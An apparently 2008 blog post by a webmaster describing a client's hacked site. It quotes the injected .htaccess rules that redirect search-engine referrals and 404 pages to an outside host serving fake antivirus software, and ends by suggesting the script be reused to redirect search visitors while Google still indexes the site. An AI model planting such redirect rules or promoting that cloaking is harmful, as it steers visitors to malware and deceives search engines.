Have you ever clicked a result in Google and gotten redirected to spyware? That may not be something running on your computer!  There is a new attack out there letting the baddies infect your local businesses website!

One of my clients from last year recently had their site hijacked by people with less than honorable intentions. All traffic coming from Google and all the error pages on the site were being redirected to a download for win antivir 2009.

The details are still emerging on how the site was compromised but from the information that I have I think the cause can be narrowed down to either an unpatched CMS or the host themselves was hijacked.   I have now locked down the CMS control panel down so you can’t access it via the web anymore, hopefully this keeps the baddies at bay for a little while.

Fun, Fun, for this company and even more fun for me since I had recently experienced this hijack as a user when Googling a local restaurants site.  Through whatever means they used to hijack the site they were able to inject the following into the .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://255.255.255.255/in.html?s=example [R,L]
Errordocument 404 http://255.255.255.255/in.html?s=example

The reason I am sharing this is that there are a lot of legitimate uses for this type of script,  I hope that some of you other webmasters out there can use it.  One example would be a site administrator who wanted to redirect search engine traffic to sign up pages while still letting Google index the site.

Posted on September 19th, 2008 by Furious Citizen
Filed under: Google, Industry News, Programming, Technology